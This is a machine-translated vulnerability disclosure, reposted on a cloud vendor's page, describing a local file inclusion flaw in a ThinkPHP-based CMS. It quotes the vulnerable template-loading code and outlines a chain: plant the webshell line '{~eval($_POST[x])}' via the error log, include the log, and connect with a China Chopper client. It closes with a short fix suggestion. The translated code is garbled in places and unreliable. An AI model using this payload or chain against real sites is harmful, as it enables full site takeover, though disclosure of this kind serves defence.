Cool cms local inclusion causes getwebshell (ThinkPHP)

Source: Internet
Author: User

You can directly control the permissions of the entire website through local inclusion of getwebshell. Vulnerability file: core \ Lib \ Action \ Home \ MyAction. class. php

<? Phpclass MyAction extends HomeAction {public function index () {$ this-> show ();} public function show () {$ id =! Empty ($ _ GET ['id'])? $ _ GET ['id']: 'hot '; $ this-> display ('My _'. trim ($ id); vulnerability }}?>

 

Includes:
Public function fetch ($ templateFile = '', $ charset ='', $ contentType = 'text/html ', $ display = false) {$ GLOBALS ['_ viewStartTime'] = microtime (TRUE); if (null = $ templateFile) // return directly using the null parameter as the template name without any output return; if (empty ($ charset) $ charset = C ('default _ charset'); // webpage character encoding header ("Content-Type :". $ contentType. "; charset = ". $ charset); header ("Cache-control: private"); // supports page bounce // page Cache ob_start (); ob_implicit_flu Sh (0); if (! File_exists_case ($ templateFile) // automatically locates the Template File $ templateFile = $ this-> parseTemplateFile ($ templateFile); // key functions are only used to process files containing templates, let me take a look at this function. $ Engine = strtolower (C ('tmpl _ ENGINE_TYPE '); if ('php' = $ engine) {// The template array variables are decomposed into independent variables extract ($ this-> tVar, EXTR_OVERWRITE); // directly load the PHP template include $ templateFile ;} elseif ('think' ===$ engine & $ this-> checkCache ($ templateFile )) {// If the Think template engine is used and the cache effectively breaks down variables and loads the template cache extract ($ this-> tVar, EXTR_OVERWRITE ); // load the template CACHE file include C ('cache _ path '). md5 ($ templateFile ). C ('tmpl _ CACHFILE_SUFFIX ');} else {// The Template file needs to be re-compiled to support third-party Template engines // call the Template engine for parsing and outputting $ className = 'template '. ucwords ($ engine); require_cache (THINK_PATH. '/Lib/Think/Util/Template /'. $ className. '. class. php '); $ tpl = new $ className; $ tpl-> fetch ($ templateFile, $ this-> tVar, $ charset);} $ this-> templateFile = $ templateFile; // get and clear the cache $ content = ob_get_clean (); // Replace the template content with $ content = $ this-> templateContentReplace ($ content ); // layout template parsing $ content = $ this-> layout ($ content, $ charset, $ contentType); // output template file return $ this-> output ($ content, $ display );}

 

Processing of included files:
Private function parseTemplateFile ($ templateFile) {if (''= $ templateFile) {// If the template file name is empty, locate $ templateFile = C ('tmpl _ FILE_NAME ') according to the default rules;} elseif (strpos ($ templateFile ,'@')) {// The operation template for introducing other themes must contain the module name, for example, blue @ User: add $ templateFile = TMPL_PATH.str_replace (array ('@',':'),'/', $ templateFile ). C ('tmpl _ TEMPLATE_SUFFIX ');} elseif (strpos ($ templateFile,': ') {// introduce the operation template of other modules $ templateFile = TEMPLATE_PATH. '/'. str_r Eplace (':', '/', $ templateFile). C ('tmpl _ TEMPLATE_SUFFIX ');} elseif (! Is_file ($ templateFile) {// introduce other operation templates of the current module $ templateFile = dirname (C ('tmpl _ FILE_NAME ')). '/'. $ templateFile. C ('tmpl _ TEMPLATE_SUFFIX ');} if (! File_exists_case ($ templateFile) throw_exception (L ('_ TEMPLATE_NOT_EXIST _'). '['. $ templateFile. ']'); return $ templateFile ;}

 

With the inclusion point, we need a file containing our malicious code. We use thinphp's error logging function: manufacturing error: Log File: Use the two features mentioned above: 1. include any file 2. error writing date 3. combine thinkphp template syntax to construct a sentence :{~ Eval ($ _ POST [x])} writes a sentence: manufacturing error: Log File: contains a sentence: Kitchen Knife link:


Solution:For program repair problems, the template parameters should not be controllable from the perspective of secondary developers. For thinkphp, the processing of template file names and paths must be improved.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.